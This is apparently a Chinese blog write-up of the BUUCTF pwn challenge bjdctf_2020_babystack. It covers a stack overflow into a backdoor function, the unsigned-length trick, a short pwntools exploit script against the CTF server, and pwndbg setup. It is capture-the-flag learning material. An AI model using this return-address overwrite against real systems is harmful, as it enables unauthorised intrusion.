日行一PWN bjdctf_2020_babystack 尝试动态调试？

BUUCTF在线评测 (buuoj.cn)还是buu的题，

这次没什么好讲的，一道送分题，

但是明白了一个道理，不要太相信ida 的伪代码，那玩意的作用是帮你快速看明白题是在干什么，而不是帮你弄清楚做出这道题的细节。

尤其是数据长度部分

那么直接来分析

首先可以看到，只有NX，和部分RELRO保护

ida静态分析

也是非常干脆的给出了后门程序

主函数更是简单，用scanf来输入一个数字，把这个数字作为我们之后再read中的数据MAX大小。而看上面的接收参数只有0x10个大小（看伪代码此处说只有十二个，其实有16个，非常折磨），因此我们只需要输入16+8+8也就是32个字节就可以利用这个后门程序

但事实上只需要30个字节就可以完成利用，具体原理不知。

from pwn import *

p = remote('node4.buuoj.cn',29581)

payload = "A" * (0x10+8) + p64(0x4006E6)


p.sendlineafter('[+]Please input the length of your name:','32')


p.sendlineafter("[+]What's u name?",payload)
p.interactive()

其他小知识

注意一下可以发现一个问题

这个nbyte是一个无符号数，因此我们可以输入一个-1来得到一个很大的数，不清楚的朋友可以去了解一下补码反码相关知识

错误的栈

可以看到，它不仅仅把buff的大小判定错了，他的栈结构也有问题，正向栈的起始点并不是0，而是从4开始的

动态调试

在本次因为栈不正确，我学习了一下动态调试

首先是安装了pwndbg，安装十分简单

git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh

之后简单的使用

gdb 打开调试
file bjdctf_2020_babystack 打开文件
start 装入内存，准备运行
ctrl + c 中断运行
vmmap 查看内存和寄存器状态
r 开始运行

这是上述程序栈的状态。今天很简单，就这些吧

顺便一提，linux是真的适合深色主题，比Windows的深色好看多了，深色壁纸也合适。小日子老师yyds